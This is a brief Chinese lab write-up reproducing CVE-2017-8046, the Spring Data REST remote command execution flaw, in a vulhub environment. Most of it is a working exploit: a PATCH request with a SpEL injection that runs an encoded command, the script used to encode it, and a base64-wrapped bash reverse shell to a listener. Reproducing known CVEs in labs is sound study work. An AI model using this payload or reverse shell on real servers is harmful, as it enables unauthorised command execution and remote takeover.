vulhub-Spring Data Rest 远程命令执行漏洞（CVE-2017-8046）

https://vulhub.org/#/environments/spring/CVE-2017-8046/
https://blog.csdn.net/qq_45300786/article/details/119301365

Spring Data Rest 远程命令执行漏洞（CVE-2017-8046）

略去docker，仅做复现漏洞记录

访问服务器，看到服务器返回json，根据提示访问customers

抓包访问的/customers/1

修改官方的payload

PATCH /customers/1 HTTP/1.1
Host: 192.168.159.144:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

payload来历：

",".join([str(ord(str(t))) for t in "touch /tmp/success"])

运行结果

成功创建了success

反弹shell

",".join([str(ord(str(t))) for t in "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1OS4xNDQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"])

设置监听

复现成功